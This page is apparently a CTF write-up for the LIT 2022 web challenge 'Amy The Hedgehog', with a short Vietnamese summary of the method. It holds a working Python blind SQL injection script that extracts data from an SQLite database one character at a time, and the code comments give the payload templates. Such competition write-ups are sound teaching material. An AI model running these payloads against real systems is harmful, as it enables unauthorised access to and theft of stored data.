GiongfNef
  • 📧Readme
  • 💰Bug Bounty
    • Business Logic: Bypass 2FA to ATO
    • 1 Click Account Take Over
  • 🥑CVE
    • CVE-2024-40492: Stored XSS to ATO
    • CVE-2023-5311
  • ☕Writeup CTF
    • Crypto
      • dvCTF 2022
      • Crew CTF 2022
      • ångstromCTF 2022
      • picoCTF 2022 + wscCTF 2022
      • Securinets CTF Quals 2022
      • NsuCrypto
      • KMA chall 2022
      • SEETF 2022
      • just CTF 2022
      • zer0pts CTF 2022
    • Web
      • ASCIS 2022 - warm up
      • RISEC CTF + UMass CTF 2022
      • LIT 2022
      • UIUCTF 2022
      • nullcon CTF2022
      • 🎃Hack The Boo 2022
    • Writeup Intigriti challenge-0923
  • 🍄Linh tinh ký sự
    • 📚Books
    • note linh tinh
      • 🐞Bug logic Shopee: Giảm 5-10% khi mua sản phẩm ?
      • 💎Financial Aid Application for Coursera
  • 🫖Wargame && Others
    • 🍀OverTheWire: Bandit
      • 🌱OverTheWire: Bandit 2022 (new)
      • 🍃OverTheWire: (old) - Bandit
      • Writeup EVABSv5.apk (12levels)
    • 📲Android
      • 📲Writeup EVABSv5.apk (Solution 12 levels)
      • 🎮Writeup droids PicoCTF - (Solution 5 levels)
    • 🌵Rootme
      • 🏝️Web - Server
      • 📟App - System
        • 🎰ELF x86 - Format string bug basic 1
        • 🐰ELF x86 - Stack buffer overflow basic 1
        • 🦊ELF x86 - Stack buffer overflow basic 2
        • 🐻ELF x86 - Stack buffer overflow basic 3
        • 🐼ELF x86 - Stack buffer overflow basic 4
        • 🐧ELF x86 - Stack buffer overflow basic 6
    • 🏆Pentest
    • 🖇️Blockchain
Powered by GitBook
On this page
Edit on GitHub
  1. Writeup CTF
  2. Web

LIT 2022

Note : A JOURNEY TO GAIN KNOWLEDGE

PreviousRISEC CTF + UMass CTF 2022NextUIUCTF 2022

Last updated 2 years ago

web/Amy The Hedgehog

import requests, string

url = "http://litctf.live:31770/"
s = requests.session()
passwordRetrieve = ""
# ' or (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('some_char')--
# find column from table: ' or (SELECT hex(substr(sql,{index},1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('{char}')-- 
alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c"
def solve():
    global passwordRetrieve
    index = 1
    len_of_password = 14 - index
    for i in range(len_of_password):
        for char in alpha:
          passwordfield = f"' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"
          postParam = {'name': passwordfield}
          response = s.post(url, data=postParam).text
          if "You got it"  in response:
              passwordRetrieve += char
              index += 1
              print("Nai here yr pass: ",passwordRetrieve, "  len:",i)
              break
          print(char)
solve()

  • Xác định SQLite -> sqlite_master -> tbl_name -> column -> name

☕
doc1
doc2